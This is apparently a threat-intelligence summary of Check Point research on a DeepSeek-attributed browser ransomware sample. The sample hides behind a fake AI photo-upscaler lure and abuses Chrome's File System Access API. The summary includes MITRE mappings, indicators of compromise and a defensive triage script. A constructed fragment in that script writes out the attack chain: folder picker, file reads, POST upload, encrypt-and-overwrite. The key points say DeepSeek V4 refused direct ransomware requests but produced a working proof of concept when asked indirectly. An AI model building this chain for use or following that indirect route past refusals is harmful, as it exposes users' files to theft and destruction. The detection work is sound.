Check Point Research found that a DeepSeek-attributed sample turned an unrealistic browser-malware idea into a plausible browser-native ransomware technique using the File System Access API. The research shows how a fake AI photo-enhancement lure on Android can trick users into granting folder access, enabling file read, exfiltration, and encryption without a native payload or browser exploit. #DeepSeek #FileSystemAccessAPI #InfernoGrabber #Chrome #Android
Key points
- Check Point Research analyzed nearly 3,000 DeepSeek-attributed files and identified one sample that implemented a browser-native ransomware concept.
- The sample, associated with the name InfernoGrabber v9.0, used a Discord-themed AI upscaler lure and a ransom-style overlay.
- The core abuse path relied on the File System Access API in Google Chrome, not on a native payload, APK, exploit, or root access.
- The browser workflow could enumerate selected directories, read files, exfiltrate content, and overwrite files after the user granted permission.
- On Android, the risk is especially high because photo directories and DCIM content can contain highly sensitive personal data.
- DeepSeek V4 could generate a working browser-based ransomware proof of concept when prompted indirectly, while direct ransomware requests were refused.
- The research highlights how LLMs can connect theoretical risks to practical attack paths and lower the expertise needed to operationalize them.
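As an added triage example (not Check Point's code and not the analyzed sample), the script below scores a captured page or script for the browser-native chain described above: a File System Access API folder handle, directory enumeration, file reads, a POST to a backend, then encrypt-and-overwrite through a writable stream. The Web API names are real; the indicator weights, verdict thresholds and both input samples are constructed for illustration.

```javascript
// Added triage example (not Check Point's or the sample's code): score a
// captured page/script for the chain the research describes:
// folder handle -> enumerate -> read -> POST to backend -> encrypt + overwrite.
// API identifiers are real; weights and the two samples are constructed.
const INDICATORS = [
  { id: "dir_picker",  weight: 3, re: /showDirectoryPicker\s*\(/ },
  { id: "file_picker", weight: 1, re: /showOpenFilePicker\s*\(/ },
  { id: "readwrite",   weight: 3, re: /mode\s*:\s*["']readwrite["']/ },
  { id: "enumerate",   weight: 2, re: /\.(values|entries|keys)\s*\(\s*\)/ },
  { id: "read",        weight: 1, re: /\.(getFile|text|arrayBuffer)\s*\(\s*\)/ },
  { id: "exfil",       weight: 3, re: /fetch\s*\([\s\S]*?method\s*:\s*["']POST["']/ },
  { id: "encrypt",     weight: 2, re: /crypto\.subtle\.encrypt\s*\(/ },
  { id: "overwrite",   weight: 3, re: /createWritable\s*\(/ },
];

function triage(source) {
  const hits = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
  const has = (id) => hits.includes(id);
  const score = INDICATORS.filter((i) => has(i.id)).reduce((s, i) => s + i.weight, 0);
  const access = has("dir_picker") || has("file_picker");
  // A picker plus a writable stream alone is what a legitimate editor does,
  // so the verdict keys on the full chain rather than on any single API.
  let verdict = "benign";
  if (access && has("overwrite") && (has("exfil") || has("encrypt"))) verdict = "ransomware-like";
  else if (access && (has("dir_picker") || has("enumerate")) && (has("overwrite") || has("exfil"))) verdict = "suspicious";
  return { score, hits, verdict };
}

// Constructed sample 1: a benign in-browser text editor (open, edit, save back).
const EDITOR_SAMPLE = `
  const [h] = await showOpenFilePicker();
  const text = await (await h.getFile()).text();
  const w = await h.createWritable(); await w.write(edit(text)); await w.close();`;

// Constructed sample 2: the lure pattern from the research, as captured page script
// (fragment only; alg/key/"/upload" are placeholders, not values from the real sample).
const LURE_SAMPLE = `
  const dir = await showDirectoryPicker({ mode: "readwrite" });
  for await (const [name, h] of dir.entries()) {
    const buf = await (await h.getFile()).arrayBuffer();
    await fetch("/upload", { method: "POST", body: buf });
    const out = await crypto.subtle.encrypt(alg, key, buf);
    const w = await h.createWritable(); await w.write(out); await w.close();
  }`;
```

Run with node and call `triage(source)` on a saved page script; it returns the matched indicator ids, a weighted score and a verdict, which is a starting point for sandbox or proxy triage, not a replacement for dynamic analysis.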
MITRE Techniques
- [T1204.002] User Execution: Malicious File - The attack depends on the victim clicking a lure and approving folder access, as described in "the user opens a web page that promises to enhance a photo" and "after user approval".
- [T1566.002] Phishing: Spearphishing Link - A fake AI image-enhancement webpage is used as the lure, described as "a fake photo-processing application" and "a Discord avatar AI upscaler".
- [T1027] Obfuscated Files or Information - The malicious intent is hidden behind a benign-looking AI utility and browser workflow, as in "disguised as a Discord avatar AI upscaler" and "a convincing AI upscaler interface with hidden ransomware-like behaviors".
- [T1056.001] Input Capture: Keylogging - The generated sample included keylogging logic, described as routines and stubs for "keylogging" and "the keylogger observes keystrokes only while the user interacts with the page".
- [T1113] Screen Capture - The code referenced screenshots, described as routines and stubs for "screenshots" and "the 'desktop screenshot' routine captures the rendered web page".
- [T1119] Automated Collection - The sample attempted to collect multiple data types automatically, including "Discord-token collection, crypto-wallet and payment-card discovery, geolocation requests" and local-file access.
- [T1552.001] Unsecured Credentials: Credentials In Files - The sample targeted stored tokens and payment data, described as "Discord-token collection" and "payment-card discovery".
- [T1083] File and Directory Discovery - The browser code could enumerate selected folders, as shown by "recursive traversal of a user-selected directory" and "enumerate local files in the selected folder".
- [T1005] Data from Local System - The page could read local files after permission was granted, described as "reading selected files through browser file handles" and "read files and folders from the local device".
- [T1041] Exfiltration Over C2 Channel - The sample was intended to send stolen file contents to a backend server, described as "sending file contents to the Flask backend" and "read and exfiltrate their contents".
- [T1486] Data Encrypted for Impact - The attack goal was to encrypt files and prevent recovery, described as "encrypt and overwrite them" and "leaves the user unable to recover the original content".
- [T1490] Inhibit System Recovery - The flow aimed to make recovery difficult by overwriting originals, described as "encrypt and overwrite them" and "unable to recover the original content".
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - The sample included a persistence concept, described as "persistence" and "service worker registration attempt" in browser storage terms.
- [T1105] Ingress Tool Transfer - The browser-side workflow delivered malicious functionality through web content and backend routes, described as a "Python Flask application that serves victim-facing HTML and JavaScript".
Indicators of Compromise
- [SHA256 hash] DeepSeek-attributed sample analyzed by researchers - 07c39f79ab92fb21557b82283472dce1c112f577d796111fb752c3c6d84c86b5
- [File names / labels] Victim-facing lure and ransom-note branding used in the sample - InfernoGrabber v9.0, Discord avatar AI upscaler
- [Application / platform names] Environment targeted by the browser-native workflow - Google Chrome, Chromium-family browsers, Chrome 132, Chrome 148
- [Web API / function names] JavaScript primitives referenced in the malicious code - showOpenFilePicker(), showDirectoryPicker()
- [Web application framework] Backend used to host victim-facing content and receive data - Python Flask application